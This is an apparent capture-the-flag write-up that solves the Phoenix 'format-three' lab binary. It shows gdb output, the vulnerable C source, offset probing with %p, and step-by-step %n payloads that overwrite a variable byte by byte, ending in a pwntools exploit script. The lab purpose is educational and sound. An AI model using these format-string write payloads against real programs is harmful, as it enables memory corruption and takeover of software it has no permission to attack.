phoenix - format 3

10 minute read

Lets list the files using ls -la command,

user@phoenix-amd64:~$ ls -la
total 28
drwxr-xr-x 2 user user 4096 Jun 13 15:44 .
drwxr-xr-x 3 root root 4096 Jan 13  2019 ..
-rw-r--r-- 1 user user  220 Jan 13  2019 .bash_logout
-rw-r--r-- 1 user user 3526 Jan 13  2019 .bashrc
-rw-r--r-- 1 user user  675 Jan 13  2019 .profile
-rwxr-xr-x 1 user user 6120 Jun 13 15:44 format-three

Lets analyze the file type of the binary using file command,

user@phoenix-amd64:~$ file format-three
format-three: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /opt/phoenix/x86_64-linux-musl/lib/ld-musl-x86_64.so.1, not stripped

It is a not stripped binary

Lets try running it,

user@phoenix-amd64:~$ ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
monish
monish
Better luck next time - got 0x00000000, wanted 0x64457845!

It seems like we have to overwrite it with some address

Lets analyse it in debugger,

There is a variable named changeme,

(gdb) info variables
All defined variables:

Non-debugging symbols:
0x00000000004007e8  __GNU_EH_FRAME_HDR
0x0000000000400850  __EH_FRAME_BEGIN__
0x0000000000400890  __FRAME_END__
0x0000000000600898  __CTOR_LIST__
0x00000000006008a0  __CTOR_END__
0x00000000006008a8  __DTOR_LIST__
0x00000000006008b0  __DTOR_END__
0x00000000006008b8  _DYNAMIC
0x00000000006009f8  _GLOBAL_OFFSET_TABLE_
0x0000000000600a38  __dso_handle
0x0000000000600a40  __TMC_END__
0x0000000000600a40  __bss_start
0x0000000000600a40  _edata
0x0000000000600a40  completed
0x0000000000600a48  dtor_idx
0x0000000000600a60  object
0x0000000000600a90  changeme
0x0000000000600a98  _end

changeme variable is at 0x0000000000600a90

Here 0x0000000000600a90 has bad chars in it, cannot pass null \x00

So lets try 32 bit,

user@phoenix-amd64:~$ nm format-three | grep changeme
08049844 B changeme

So changeme is at 0x08049844

Lets view the source code for proper understanding,

#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BANNER \
  "Welcome to " LEVELNAME ", brought to you by https://exploit.education"

int changeme;

void bounce(char *str) {
  printf(str);
}

int main(int argc, char **argv) {
  char buf[4096];
  printf("%s\n", BANNER);

  if (read(0, buf, sizeof(buf) - 1) <= 0) {
    exit(EXIT_FAILURE);
  }

  bounce(buf);

  if (changeme == 0x64457845) {
    puts("Well done, the 'changeme' variable has been changed correctly!");
  } else {
    printf(
        "Better luck next time - got 0x%08x, wanted 0x64457845!\n", changeme);
  }

  exit(0);
}

The buffer here has a size of 4096 bytes

The main condition to pass the program is,

if (changeme == 0x64457845) {
    puts("Well done, the 'changeme' variable has been changed correctly!");
  } else {
    printf(
        "Better luck next time - got 0x%08x, wanted 0x64457845!\n", changeme);
  }

So we have to overwrite the value of changeme to 0x64457845

>>> print("\x45\x78\x45\x64")
ExEd

It is almost similar to the last challenge

Now lets try to pass our input with format strings to find our offset

user@phoenix-amd64:~$ ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
AAAA %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p
AAAA 0 0 0 0xf7f81cf7 0xf7ffb000 0xffffd758 0x8048556 0xffffc750 0xffffc750 0xfff 0 0x41414141 0x20702520 0x25207025 0x70252070
Better luck next time - got 0x00000000, wanted 0x64457845!

So our input AAAA that we passed to fuzz the offset location is at 12th place

Now,lets try to write it using %n

user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08 '+'%p '*14)" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
 0 0 0 0xf7f81cf7 0xf7ffb000 0xffffd758 0x8048556 0xffffc750 0xffffc750 0xfff 0 0x8049844 0x20702520 0x25207025
Better luck next time - got 0x00000000, wanted 0x64457845!
user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08 '+'%p '*11+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
 0 0 0 0xf7f81cf7 0xf7ffb000 0xffffd758 0x8048556 0xffffc750 0xffffc750 0xfff 0
Better luck next time - got 0x00000054, wanted 0x64457845!

Now lets split changeme variable into 4 parts

From, 0x08049844 is for last byte (LSB) - 1st part

To,0x08049844+0x3 for first byte (MSB) - 4th part

(1 byte = 8 bits , 1 hex char = 4 bits)

So we are able to write 0x00000054 into changeme with our inputs and %n

Lets try increasing it by our data into stdin,

user@phoenix-amd64:~$ python -c "print('AAAA'+'\x44\x98\x04\x08 '+'%p '*12+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
AAAA 0 0 0 0xf7f81cf7 0xf7ffb000 0xffffd758 0x8048556 0xffffc750 0xffffc750 0xfff 0 0x41414141
Better luck next time - got 0x00000063, wanted 0x64457845!

Further more,

user@phoenix-amd64:~$ python -c "print('AAAABBBB'+'\x44\x98\x04\x08 '+'%p '*13+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
AAAABBBB 0 0 0 0xf7f81cf7 0xf7ffb000 0xffffd758 0x8048556 0xffffc750 0xffffc750 0xfff 0 0x41414141 0x42424242
Better luck next time - got 0x00000072, wanted 0x64457845!

So if we pass the correct byte offset address and write the values with %n we can control it with specific value,

Lets try it from start,

user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08 '+'%p '*11+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
 0 0 0 0xf7f81cf7 0xf7ffb000 0xffffd748 0x8048556 0xffffc740 0xffffc740 0xfff 0
Better luck next time - got 0x00000054, wanted 0x64457845!
user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08 '+'\x45\x98\x04\x08 '+'%p '*11+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
  0 0 0 0xf7f81cf7 0xf7ffb000 0xffffd748 0x8048556 0xffffc740 0xffffc740 0xfff 0
Better luck next time - got 0x00000059, wanted 0x64457845!
user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08 '+'\x45\x98\x04\x08'+'%p '*11+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
 0 0 0 0xf7f81cf7 0xf7ffb000 0xffffd748 0x8048556 0xffffc740 0xffffc740 0xfff 0
Better luck next time - got 0x00000058, wanted 0x64457845!

So we can clearly see that, we can write 5 bytes if we pass data with white space and 4 bytes if we pass it without white space

Lets pass without white space for easier calculation,

user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'%p '*11+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0 0 0 0xf7f81cf7 0xf7ffb000 0xffffd748 0x8048556 0xffffc740 0xffffc740 0xfff 0
Better luck next time - got 0x00000053, wanted 0x64457845!
user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'\x45\x98\x04\x08'+'%p '*11+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0 0 0 0xf7f81cf7 0xf7ffb000 0xffffd748 0x8048556 0xffffc740 0xffffc740 0xfff 0
Better luck next time - got 0x00000057, wanted 0x64457845!
user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'\x45\x98\x04\x08'+'%p'*11+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0000xf7f81cf70xf7ffb0000xffffd7480x80485560xffffc7400xffffc7400xfff0
Better luck next time - got 0x0000004c, wanted 0x64457845!

On second part,

user@phoenix-amd64:~$ python -c "print('AAAA'+'\x45\x98\x04\x08'+'%p '*12+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
AAAA0 0 0 0xf7f81cf7 0xf7ffb000 0xffffd748 0x8048556 0xffffc740 0xffffc740 0xfff 0 0x41414141
Better luck next time - got 0x00006200, wanted 0x64457845!
user@phoenix-amd64:~$ python -c "print('AAAA'+'\x45\x98\x04\x08'+'%p'*12+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
AAAA0000xf7f81cf70xf7ffb0000xffffd7480x80485560xffffc7400xffffc7400xfff00x41414141
Better luck next time - got 0x00005600, wanted 0x64457845!

On third part,

user@phoenix-amd64:~$ python -c "print('AAAA'+'\x46\x98\x04\x08'+'%p '*12+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
AAAA0 0 0 0xf7f81cf7 0xf7ffb000 0xffffd748 0x8048556 0xffffc740 0xffffc740 0xfff 0 0x41414141
Better luck next time - got 0x00620000, wanted 0x64457845!
user@phoenix-amd64:~$ python -c "print('AAAA'+'\x46\x98\x04\x08'+'%p'*12+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
AAAA0000xf7f81cf70xf7ffb0000xffffd7480x80485560xffffc7400xffffc7400xfff00x41414141
Better luck next time - got 0x00560000, wanted 0x64457845!

On last part,

user@phoenix-amd64:~$ python -c "print('AAAA'+'\x47\x98\x04\x08'+'%p '*12+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
AAAA0 0 0 0xf7f81cf7 0xf7ffb000 0xffffd748 0x8048556 0xffffc740 0xffffc740 0xfff 0 0x41414141
Better luck next time - got 0x62000000, wanted 0x64457845!
user@phoenix-amd64:~$ python -c "print('AAAA'+'\x47\x98\x04\x08'+'%p'*12+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
AAAA0000xf7f81cf70xf7ffb0000xffffd7480x80485560xffffc7400xffffc7400xfff00x41414141
Better luck next time - got 0x56000000, wanted 0x64457845!

Now we know what addresses can control what part

But we need to know what data can write the desired number of bytes with %n into that address

And note that,even our format specifiers can change the number of bytes written

user@phoenix-amd64:~$ python -c "print('\x47\x98\x04\x08'+'%p '*11+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0 0 0 0xf7f81cf7 0xf7ffb000 0xffffd748 0x8048556 0xffffc740 0xffffc740 0xfff 0
Better luck next time - got 0x53000000, wanted 0x64457845!
user@phoenix-amd64:~$ python -c "print('\x47\x98\x04\x08'+'%x '*11+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0 0 0 f7f81cf7 f7ffb000 ffffd748 8048556 ffffc740 ffffc740 fff 0
Better luck next time - got 0x45000000, wanted 0x64457845!
user@phoenix-amd64:~$ python -c "print('\x47\x98\x04\x08'+'%d '*11+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0 0 0 -134734601 -134238208 -10424 134514006 -14528 -14528 4095 0
Better luck next time - got 0x46000000, wanted 0x64457845!

So its going to be trial and error from now,

On first byte,

user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'%x'*11+'AAAAAAAAAAA'+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
000f7f81cf7f7ffb000ffffd7488048556ffffc740ffffc740fff0AAAAAAAAAAA
Better luck next time - got 0x00000045, wanted 0x64457845!
user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'%x'*11+'A'*11+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
000f7f81cf7f7ffb000ffffd7488048556ffffc740ffffc740fff0AAAAAAAAAAA
Better luck next time - got 0x00000045, wanted 0x64457845!

But here comes the tricky part,we cannot pass our addresses at different places

We need to put it in order

user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'\x45\x98\x04\x08'+'\x46\x98\x04\x08'+'\x47\x98\x04\x08'+'%p'*20)" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0000xf7f81cf70xf7ffb0000xffffd7480x80485560xffffc7400xffffc7400xfff00x80498440x80498450x80498460x80498470x702570250x702570250x702570250x702570250x70257025
Better luck next time - got 0x00000000, wanted 0x64457845!

We have placed it in order,now lets try our trial and error

user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'\x45\x98\x04\x08'+'\x46\x98\x04\x08'+'\x47\x98\x04\x08'+'%p'*11+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0000xf7f81cf70xf7ffb0000xffffd7480x80485560xffffc7400xffffc7400xfff0
Better luck next time - got 0x00000054, wanted 0x64457845!
user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'\x45\x98\x04\x08'+'\x46\x98\x04\x08'+'\x47\x98\x04\x08'+'%x'*11+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
000f7f81cf7f7ffb000ffffd7488048556ffffc740ffffc740fff0
Better luck next time - got 0x00000046, wanted 0x64457845!
user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'\x45\x98\x04\x08'+'\x46\x98\x04\x08'+'\x47\x98\x04\x08'+'%d'*11+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
000-134734601-134238208-10424134514006-14528-1452840950
Better luck next time - got 0x00000047, wanted 0x64457845!

There is no way we could write it with 45, so lets aim for 145

>>> int(0x145-0x54)
241

So we need 241 bytes of junk value

user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'\x45\x98\x04\x08'+'\x46\x98\x04\x08'+'\x47\x98\x04\x08'+'%p'*11+'A'*241+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0000xf7f81cf70xf7ffb0000xffffd7480x80485560xffffc7400xffffc7400xfff0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Better luck next time - got 0x00000145, wanted 0x64457845!

Now we overwrote it correctly

Lets do it for second part,

user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'\x45\x98\x04\x08'+'\x46\x98\x04\x08'+'\x47\x98\x04\x08'+'%p'*11+'A'*241+'%n'+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0000xf7f81cf70xf7ffb0000xffffd7480x80485560xffffc7400xffffc7400xfff0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Better luck next time - got 0x00014545, wanted 0x64457845!

We need to increase it

>>> int(0x78-0x45)
51

So 51 bytes of junk needed

user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'\x45\x98\x04\x08'+'\x46\x98\x04\x08'+'\x47\x98\x04\x08'+'%p'*11+'A'*241+'%n'+'A'*51+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0000xf7f81cf70xf7ffb0000xffffd7480x80485560xffffc7400xffffc7400xfff0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Better luck next time - got 0x00017845, wanted 0x64457845!

Now lets go for third part,

user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'\x45\x98\x04\x08'+'\x46\x98\x04\x08'+'\x47\x98\x04\x08'+'%p'*11+'A'*241+'%n'+'A'*51+'%n'+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0000xf7f81cf70xf7ffb0000xffffd7480x80485560xffffc7400xffffc7400xfff0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Better luck next time - got 0x01787845, wanted 0x64457845!
>>> int(0x145-0x78)
205

We need 205 bytes of junk values

user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'\x45\x98\x04\x08'+'\x46\x98\x04\x08'+'\x47\x98\x04\x08'+'%p'*11+'A'*241+'%n'+'A'*51+'%n'+'A'*205+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0000xf7f81cf70xf7ffb0000xffffd7480x80485560xffffc7400xffffc7400xfff0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Better luck next time - got 0x02457845, wanted 0x64457845!

Our last part,

user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'\x45\x98\x04\x08'+'\x46\x98\x04\x08'+'\x47\x98\x04\x08'+'%p'*11+'A'*241+'%n'+'A'*51+'%n'+'A'*205+'%n'+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0000xf7f81cf70xf7ffb0000xffffd7480x80485560xffffc7400xffffc7400xfff0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Better luck next time - got 0x45457845, wanted 0x64457845!
>>> int(0x64-0x45)
31

We need more 31 bytes of junk values

user@phoenix-amd64:~$ python -c "print('\x44\x98\x04\x08'+'\x45\x98\x04\x08'+'\x46\x98\x04\x08'+'\x47\x98\x04\x08'+'%p'*11+'A'*241+'%n'+'A'*51+'%n'+'A'*205+'%n'+'A'*31+'%n')" | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0000xf7f81cf70xf7ffb0000xffffd7480x80485560xffffc7400xffffc7400xfff0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Well done, the 'changeme' variable has been changed correctly!

Thats it! We have completed our challenge

Lets create an exploit for this,

user@phoenix-amd64:~$ cat exploit.py
from pwn import *
junk='A'
changeme=0x08049844
buf=""
buf+=p32(changeme)
buf+=p32(changeme+1)
buf+=p32(changeme+2)
buf+=p32(changeme+3)
buf+='%p'*11
buf+=junk*241
buf+='%n'
buf+=junk*51
buf+='%n'
buf+=junk*205
buf+='%n'
buf+=junk*31
buf+='%n'
print(buf)

Lets try running it,

user@phoenix-amd64:~$ python exploit.py | ./format-three
Welcome to phoenix/format-three, brought to you by https://exploit.education
0000xf7f81cf70xf7ffb0000xffffd7480x80485560xffffc7400xffffc7400xfff0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Well done, the 'changeme' variable has been changed correctly!

Done! We have completed our “format-three” challenge